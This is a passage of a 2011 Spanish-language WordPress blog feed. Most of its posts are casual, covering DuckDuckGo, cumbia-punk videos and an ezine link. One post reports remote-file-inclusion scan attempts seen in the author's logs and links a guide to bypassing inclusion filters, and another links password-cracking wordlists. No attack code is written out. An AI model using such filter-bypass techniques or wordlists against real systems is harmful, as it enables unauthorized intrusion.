<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/elrincondeseth.wordpress.com/460/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/elrincondeseth.wordpress.com/460/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/elrincondeseth.wordpress.com/460/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/elrincondeseth.wordpress.com/460/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/elrincondeseth.wordpress.com/460/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/elrincondeseth.wordpress.com/460/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/elrincondeseth.wordpress.com/460/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/elrincondeseth.wordpress.com/460/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/elrincondeseth.wordpress.com/460/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/elrincondeseth.wordpress.com/460/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/elrincondeseth.wordpress.com/460/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/elrincondeseth.wordpress.com/460/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/elrincondeseth.wordpress.com/460/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/elrincondeseth.wordpress.com/460/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elrincondeseth.wordpress.com&amp;blog=11087471&amp;post=460&amp;subd=elrincondeseth&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://elrincondeseth.wordpress.com/2011/08/05/reto-5/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/de4a8fabc7d8f1020d1cc0a36ebc1008?s=96&#38;d=wavatar&#38;r=R" medium="image">
			<media:title type="html">elrincondeseth</media:title>
		</media:content>
	</item>
		<item>
		<title>DuckDuckGo</title>
		<link>http://elrincondeseth.wordpress.com/2011/08/03/duckduckgo/</link>
		<comments>http://elrincondeseth.wordpress.com/2011/08/03/duckduckgo/#comments</comments>
		<pubDate>Wed, 03 Aug 2011 01:51:30 +0000</pubDate>
		<dc:creator>elrincondeseth</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://elrincondeseth.wordpress.com/?p=453</guid>
		<description><![CDATA[Hace mas o menos cinco meses que mi buscador favorito es duckduckgo. Comparandolo con yahoo o bing tiene una ventaja muy obvia: no es una mierda. Al compararlo con google el asunto se pone mas peleado asi que voy a linkear bastante. Si sos de los que se preocupan por su privacidad, ddg te va [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elrincondeseth.wordpress.com&amp;blog=11087471&amp;post=453&amp;subd=elrincondeseth&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Hace mas o menos cinco meses que mi buscador favorito es duckduckgo. Comparandolo con yahoo o bing tiene una ventaja muy obvia: no es una mierda. Al compararlo con google el asunto se pone mas peleado asi que voy a linkear bastante.<br />
Si sos de los que se preocupan por su privacidad, ddg te va a gustar porque <a href="http://donttrack.us/">no te sigue</a> <a href="http://dontbubble.us/">ni te cambia los resultados</a>, evita que tu navegador mande el referer en los links salientes y tiene https. Capaz queres ver la <a href="https://duckduckgo.com/privacy.html">politica de privacidad</a> (una de las primeras que puedo entender de una)<br />
Si sos de los que les gusta modificar todo, mirá <a href="https://duckduckgo.com/settings.html">las opciones</a>, podes modificar varias cosas<br />
Si queres ahorrar tiempo, mirá <a href="https://duckduckgo.com/tech.html">esto</a> y <a href="https://duckduckgo.com/goodies.html">esto</a>. Lo que mas te va a ahorrar tiempo son los !bang, probá poniendo !taringa, !g o !gi al final o al principio de tu busqueda.<br />
Si usas firefox, instalá <a href="https://addons.mozilla.org/en-US/firefox/addon/duck-duck-go-ssl-search-plugin/">el addon</a> para tenerlo como buscador predeterminado.</p>
<p>Los unicos dos problemas que le encuentro es que se confunde con algunas búsquedas y le falta indexar mas webs para otras, pero en esos casos (que son pocos) pongo !g y ya estoy de vuelta en google.<br />
Dejo <a href="https://duckduckgo.com/?q=wikipedia">algunas</a> <a href="https://duckduckgo.com/?q=file_get_contents&amp;kl=ar-es">busquedas</a> para que <a href="https://duckduckgo.com/?q=debian&amp;kl=ar-es">vean</a> lo <a href="https://duckduckgo.com/?q=encode+url+asd%2Fqwe%23+11&amp;kl=ar-es">groso</a> <a href="https://duckduckgo.com/?q=site%3Ataringa.net+carlin+calvo">que</a> <a href="https://duckduckgo.com/?q=rainbow&amp;kl=ar-es">es</a>.</p>
<p><a href="https://duckduckgo.com/">https://duckduckgo.com/</a>, #duckduckgo en freenode</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/elrincondeseth.wordpress.com/453/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/elrincondeseth.wordpress.com/453/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/elrincondeseth.wordpress.com/453/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/elrincondeseth.wordpress.com/453/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/elrincondeseth.wordpress.com/453/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/elrincondeseth.wordpress.com/453/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/elrincondeseth.wordpress.com/453/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/elrincondeseth.wordpress.com/453/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/elrincondeseth.wordpress.com/453/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/elrincondeseth.wordpress.com/453/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/elrincondeseth.wordpress.com/453/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/elrincondeseth.wordpress.com/453/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/elrincondeseth.wordpress.com/453/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/elrincondeseth.wordpress.com/453/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elrincondeseth.wordpress.com&amp;blog=11087471&amp;post=453&amp;subd=elrincondeseth&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://elrincondeseth.wordpress.com/2011/08/03/duckduckgo/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/de4a8fabc7d8f1020d1cc0a36ebc1008?s=96&#38;d=wavatar&#38;r=R" medium="image">
			<media:title type="html">elrincondeseth</media:title>
		</media:content>
	</item>
		<item>
		<title>RFI por ftp</title>
		<link>http://elrincondeseth.wordpress.com/2011/07/08/rfi-por-ftp/</link>
		<comments>http://elrincondeseth.wordpress.com/2011/07/08/rfi-por-ftp/#comments</comments>
		<pubDate>Fri, 08 Jul 2011 13:39:45 +0000</pubDate>
		<dc:creator>elrincondeseth</dc:creator>
				<category><![CDATA[Vulnerabilidades]]></category>

		<guid isPermaLink="false">http://elrincondeseth.wordpress.com/?p=450</guid>
		<description><![CDATA[Hace bastante estaba aburrido e hice que mi pagina loguee algunos intentos de ataque. Generalmente se ve alguien que mete una comilla, algunos bots que llegan por un enlace viejo (quedan logueados como ataque por un error), algun escaneo de acunetix, scanners de inyecciones sql en plugins de joomla/phpbb/algun cms que esté en exploitdb o [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elrincondeseth.wordpress.com&amp;blog=11087471&amp;post=450&amp;subd=elrincondeseth&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Hace bastante estaba aburrido e hice que mi pagina loguee algunos <a href="http://www.xd-blog.com.ar/?id=7">intentos de ataque</a>. Generalmente se ve alguien que mete una comilla, algunos bots que llegan por un enlace viejo (quedan logueados como ataque por un error), algun escaneo de acunetix, scanners de inyecciones sql en plugins de joomla/phpbb/algun cms que esté en exploitdb o scanners de rfi (todavia funcionan?). Generalmente los scanners de rfi ponen un archivo externo al que se accede por http, pero esta vez parece que trataron de bypassear algunos filtros:<br />
<img src="http://xd-blog.com.ar//imagenes/rfi-ftp.png" alt="" /></p>
<p>Capaz hay algun brasilero leyendo <a href="http://xd-blog.com.ar/descargas/manuales/bugs/LFI-RFI-UNDERSEC.pdf">este texto sobre bypass de filtros</a>?</p>
<p>Buscando la url en google y ddg para ver cuantas webs habian escaneado me encontre con esto:<br />
<img src="http://xd-blog.com.ar//imagenes/ftp-rfi.png" alt="null" /></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/elrincondeseth.wordpress.com/450/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/elrincondeseth.wordpress.com/450/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/elrincondeseth.wordpress.com/450/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/elrincondeseth.wordpress.com/450/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/elrincondeseth.wordpress.com/450/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/elrincondeseth.wordpress.com/450/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/elrincondeseth.wordpress.com/450/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/elrincondeseth.wordpress.com/450/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/elrincondeseth.wordpress.com/450/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/elrincondeseth.wordpress.com/450/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/elrincondeseth.wordpress.com/450/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/elrincondeseth.wordpress.com/450/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/elrincondeseth.wordpress.com/450/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/elrincondeseth.wordpress.com/450/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elrincondeseth.wordpress.com&amp;blog=11087471&amp;post=450&amp;subd=elrincondeseth&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://elrincondeseth.wordpress.com/2011/07/08/rfi-por-ftp/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/de4a8fabc7d8f1020d1cc0a36ebc1008?s=96&#38;d=wavatar&#38;r=R" medium="image">
			<media:title type="html">elrincondeseth</media:title>
		</media:content>

		<media:content url="http://xd-blog.com.ar//imagenes/rfi-ftp.png" medium="image" />

		<media:content url="http://xd-blog.com.ar//imagenes/ftp-rfi.png" medium="image">
			<media:title type="html">null</media:title>
		</media:content>
	</item>
		<item>
		<title>Sos tan ciego que no ves a un gorila</title>
		<link>http://elrincondeseth.wordpress.com/2011/07/02/sos-tan-ciego-que-no-ves-a-un-gorila/</link>
		<comments>http://elrincondeseth.wordpress.com/2011/07/02/sos-tan-ciego-que-no-ves-a-un-gorila/#comments</comments>
		<pubDate>Sat, 02 Jul 2011 21:06:54 +0000</pubDate>
		<dc:creator>elrincondeseth</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://elrincondeseth.wordpress.com/?p=446</guid>
		<description><![CDATA[Y te lo pruebo: http://www.theinvisiblegorilla.com/videos.html<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elrincondeseth.wordpress.com&amp;blog=11087471&amp;post=446&amp;subd=elrincondeseth&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Y te lo pruebo: <a href="http://www.theinvisiblegorilla.com/videos.html">http://www.theinvisiblegorilla.com/videos.html</a></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/elrincondeseth.wordpress.com/446/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/elrincondeseth.wordpress.com/446/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/elrincondeseth.wordpress.com/446/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/elrincondeseth.wordpress.com/446/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/elrincondeseth.wordpress.com/446/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/elrincondeseth.wordpress.com/446/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/elrincondeseth.wordpress.com/446/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/elrincondeseth.wordpress.com/446/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/elrincondeseth.wordpress.com/446/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/elrincondeseth.wordpress.com/446/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/elrincondeseth.wordpress.com/446/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/elrincondeseth.wordpress.com/446/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/elrincondeseth.wordpress.com/446/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/elrincondeseth.wordpress.com/446/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elrincondeseth.wordpress.com&amp;blog=11087471&amp;post=446&amp;subd=elrincondeseth&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://elrincondeseth.wordpress.com/2011/07/02/sos-tan-ciego-que-no-ves-a-un-gorila/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/de4a8fabc7d8f1020d1cc0a36ebc1008?s=96&#38;d=wavatar&#38;r=R" medium="image">
			<media:title type="html">elrincondeseth</media:title>
		</media:content>
	</item>
		<item>
		<title>Mas cumbia punk!</title>
		<link>http://elrincondeseth.wordpress.com/2011/06/13/mas-cumbia-punk/</link>
		<comments>http://elrincondeseth.wordpress.com/2011/06/13/mas-cumbia-punk/#comments</comments>
		<pubDate>Mon, 13 Jun 2011 04:03:12 +0000</pubDate>
		<dc:creator>elrincondeseth</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://elrincondeseth.wordpress.com/?p=439</guid>
		<description><![CDATA[En mi intento de influenciar futuros músicos para lograr que en el futuro podamos escuchar los mejores temas del retutu tocados mas rapido y con bateria en el luna park,  sigo linkeando videos de estas mezclas entre cumbia y punk. Hay un par de temas medio pop, pero fueron lo mejor que encontré, si alguien [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elrincondeseth.wordpress.com&amp;blog=11087471&amp;post=439&amp;subd=elrincondeseth&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>En mi intento de influenciar futuros músicos para lograr que en el futuro podamos escuchar los mejores temas del retutu tocados mas rapido y con bateria en el luna park,  sigo linkeando videos de estas mezclas entre cumbia y punk. Hay un par de temas medio pop, pero fueron lo mejor que encontré, si alguien hace un cover de yo no se mañana tocandolo como tukera me avisa.</p>
<p><a href="http://www.youtube.com/watch?v=7L0B9omv-A8">Una calle me separa &#8211; Patada en la nuca</a></p>
<p><a href="http://www.youtube.com/watch?v=-bFig2Lpzhk&amp;feature=related">La danza de los mirlos</a></p>
<p><a href="http://www.youtube.com/watch?v=lakH-9j8G1I&amp;feature=related">Su florcita &#8211; Placas 92</a></p>
<p><a href="http://www.youtube.com/watch?v=YW7my5DwW98&amp;feature=related">Su florcita &#8211; Turi</a></p>
<p><a href="http://www.youtube.com/watch?v=AzfIthIhePI&amp;feature=related">La fiesta de tu hermana &#8211; Telefono descompuesto</a></p>
<p><a href="http://www.youtube.com/watch?v=IkeiSSBOpyU">El humo de mi fasito</a></p>
<p><a href="http://www.youtube.com/watch?v=myaMPM42Pjw&amp;feature=related">Yo no se mañana &#8211; Expedición ladines </a></p>
<p><a href="http://www.youtube.com/watch?v=myaMPM42Pjw&amp;feature=related">Yo no se mañana &#8211; The rotten</a></p>
<p>Un par de videos que no son cumbia punk pero la rompen:</p>
<p><a href="http://www.youtube.com/watch?v=E7VU_p0sxfI&amp;feature=related">Nalga &#8211; Cumbiagore sabrosona</a></p>
<p><a href="http://www.youtube.com/watch?v=vO8zZjlZnQ8&amp;feature=mfu_in_order&amp;list=UL">Para no verte mas &#8211; The rotten</a></p>
<p>En mi exaustiva investigación de la cumbiancha de tres tonos encontré un par de bandas que se zarpan en grosas. Pongo un par de videos, pero hay que bajarse los cds:</p>
<p><a href="http://www.youtube.com/watch?v=mEpruYd30Yo">El talibán del amor &#8211; Dead menems </a></p>
<p><a href="http://www.youtube.com/watch?v=7Iepu-9j4DQ&amp;feature=related">Socios de paja &#8211; Dead menems</a></p>
<p><a href="http://www.youtube.com/watch?v=ELeqjpTSVM0&amp;feature=related">Los chetos son buenos &#8211; Dead menems</a></p>
<p><a href="http://www.youtube.com/watch?v=6noY6Unrqm4">La china es cumbianchera &#8211; Kumbia queers</a></p>
<p><a href="http://www.youtube.com/watch?v=1YxLlALIf28&amp;feature=related">Metamorfosis adolescente &#8211; Kumbia queers</a></p>
<p><a href="http://www.youtube.com/watch?v=2PWno0aC1_I&amp;feature=related">Chica de metal &#8211; Kumbia queers</a></p>
<p>No se por que colgué y no puse los videos antes, pero tocó punkycacos en vivo en parque centenario y estan todos los videos en youtube: <a href="http://www.youtube.com/watch?v=WFj0ufWXpWs">Anarkia</a> <a href="http://www.youtube.com/watch?v=iUTwYLZeGLE">para</a> <a href="http://www.youtube.com/watch?v=NZ42lyNcs_Y">los</a> <a href="http://www.youtube.com/watch?v=akMst6PxYGM">guachines</a></p>
<p>&nbsp;</p>
<p>Cuando tenga ganas hago un post re groso sobre oxizakre. Si quieren que lo haga antes, pueden donar bitcoins o <a href="http://sp6.fotolog.com/photo/54/37/105/marclasuciarata/1207623207_f.jpg">fernucos</a>.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/elrincondeseth.wordpress.com/439/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/elrincondeseth.wordpress.com/439/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/elrincondeseth.wordpress.com/439/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/elrincondeseth.wordpress.com/439/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/elrincondeseth.wordpress.com/439/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/elrincondeseth.wordpress.com/439/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/elrincondeseth.wordpress.com/439/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/elrincondeseth.wordpress.com/439/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/elrincondeseth.wordpress.com/439/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/elrincondeseth.wordpress.com/439/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/elrincondeseth.wordpress.com/439/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/elrincondeseth.wordpress.com/439/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/elrincondeseth.wordpress.com/439/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/elrincondeseth.wordpress.com/439/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elrincondeseth.wordpress.com&amp;blog=11087471&amp;post=439&amp;subd=elrincondeseth&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://elrincondeseth.wordpress.com/2011/06/13/mas-cumbia-punk/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/de4a8fabc7d8f1020d1cc0a36ebc1008?s=96&#38;d=wavatar&#38;r=R" medium="image">
			<media:title type="html">elrincondeseth</media:title>
		</media:content>
	</item>
		<item>
		<title>Camaras</title>
		<link>http://elrincondeseth.wordpress.com/2011/06/04/435/</link>
		<comments>http://elrincondeseth.wordpress.com/2011/06/04/435/#comments</comments>
		<pubDate>Sat, 04 Jun 2011 08:17:55 +0000</pubDate>
		<dc:creator>elrincondeseth</dc:creator>
				<category><![CDATA[PHP]]></category>

		<guid isPermaLink="false">http://elrincondeseth.wordpress.com/?p=435</guid>
		<description><![CDATA[Aburrimiento de las 5 am<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elrincondeseth.wordpress.com&amp;blog=11087471&amp;post=435&amp;subd=elrincondeseth&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><a href="http://xd-blog.com.ar/cams/?">Aburrimiento de las 5 am</a></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/elrincondeseth.wordpress.com/435/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/elrincondeseth.wordpress.com/435/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/elrincondeseth.wordpress.com/435/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/elrincondeseth.wordpress.com/435/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/elrincondeseth.wordpress.com/435/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/elrincondeseth.wordpress.com/435/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/elrincondeseth.wordpress.com/435/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/elrincondeseth.wordpress.com/435/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/elrincondeseth.wordpress.com/435/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/elrincondeseth.wordpress.com/435/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/elrincondeseth.wordpress.com/435/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/elrincondeseth.wordpress.com/435/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/elrincondeseth.wordpress.com/435/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/elrincondeseth.wordpress.com/435/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elrincondeseth.wordpress.com&amp;blog=11087471&amp;post=435&amp;subd=elrincondeseth&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://elrincondeseth.wordpress.com/2011/06/04/435/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/de4a8fabc7d8f1020d1cc0a36ebc1008?s=96&#38;d=wavatar&#38;r=R" medium="image">
			<media:title type="html">elrincondeseth</media:title>
		</media:content>
	</item>
		<item>
		<title>Ezine Level-23 #1</title>
		<link>http://elrincondeseth.wordpress.com/2011/06/03/ezine-level-23-1/</link>
		<comments>http://elrincondeseth.wordpress.com/2011/06/03/ezine-level-23-1/#comments</comments>
		<pubDate>Fri, 03 Jun 2011 08:39:35 +0000</pubDate>
		<dc:creator>elrincondeseth</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://elrincondeseth.wordpress.com/?p=430</guid>
		<description><![CDATA[http://www.multiupload.com/1391H2REK8 http://xd-blog.com.ar//descargas/ezines/level-23/level-23-1.pdf<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elrincondeseth.wordpress.com&amp;blog=11087471&amp;post=430&amp;subd=elrincondeseth&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><img class="aligncenter" src="http://img405.imageshack.us/img405/146/ezinelevel231.jpg" alt="" /></p>
<p><a href="http://www.multiupload.com/1391H2REK8">http://www.multiupload.com/1391H2REK8</a></p>
<p><a href="http://xd-blog.com.ar//descargas/ezines/level-23/level-23-1.pdf">http://xd-blog.com.ar//descargas/ezines/level-23/level-23-1.pdf</a></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/elrincondeseth.wordpress.com/430/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/elrincondeseth.wordpress.com/430/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/elrincondeseth.wordpress.com/430/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/elrincondeseth.wordpress.com/430/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/elrincondeseth.wordpress.com/430/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/elrincondeseth.wordpress.com/430/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/elrincondeseth.wordpress.com/430/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/elrincondeseth.wordpress.com/430/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/elrincondeseth.wordpress.com/430/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/elrincondeseth.wordpress.com/430/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/elrincondeseth.wordpress.com/430/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/elrincondeseth.wordpress.com/430/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/elrincondeseth.wordpress.com/430/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/elrincondeseth.wordpress.com/430/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elrincondeseth.wordpress.com&amp;blog=11087471&amp;post=430&amp;subd=elrincondeseth&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://elrincondeseth.wordpress.com/2011/06/03/ezine-level-23-1/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/de4a8fabc7d8f1020d1cc0a36ebc1008?s=96&#38;d=wavatar&#38;r=R" medium="image">
			<media:title type="html">elrincondeseth</media:title>
		</media:content>

		<media:content url="http://img405.imageshack.us/img405/146/ezinelevel231.jpg" medium="image" />
	</item>
		<item>
		<title>Diccionarios</title>
		<link>http://elrincondeseth.wordpress.com/2011/06/03/diccionarios/</link>
		<comments>http://elrincondeseth.wordpress.com/2011/06/03/diccionarios/#comments</comments>
		<pubDate>Fri, 03 Jun 2011 05:47:09 +0000</pubDate>
		<dc:creator>elrincondeseth</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://elrincondeseth.wordpress.com/?p=428</guid>
		<description><![CDATA[Subí algunos a http://xd-blog.com.ar/descargas/diccionarios/ Varios son de http://www.skullsecurity.org/wiki/index.php/Passwords<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elrincondeseth.wordpress.com&amp;blog=11087471&amp;post=428&amp;subd=elrincondeseth&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Subí algunos a <a href="http://xd-blog.com.ar/descargas/diccionarios/" rel="nofollow" target="_blank">http://xd-blog.com.ar/descargas/diccionarios/</a></p>
<p>Varios son de <a href="http://www.skullsecurity.org/wiki/index.php/Passwords">http://www.skullsecurity.org/wiki/index.php/Passwords </a></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/elrincondeseth.wordpress.com/428/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/elrincondeseth.wordpress.com/428/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/elrincondeseth.wordpress.com/428/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/elrincondeseth.wordpress.com/428/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/elrincondeseth.wordpress.com/428/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/elrincondeseth.wordpress.com/428/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/elrincondeseth.wordpress.com/428/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/elrincondeseth.wordpress.com/428/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/elrincondeseth.wordpress.com/428/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/elrincondeseth.wordpress.com/428/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/elrincondeseth.wordpress.com/428/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/elrincondeseth.wordpress.com/428/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/elrincondeseth.wordpress.com/428/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/elrincondeseth.wordpress.com/428/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=elrincondeseth.wordpress.com&amp;blog=11087471&amp;post=428&amp;subd=elrincondeseth&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://elrincondeseth.wordpress.com/2011/06/03/diccionarios/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
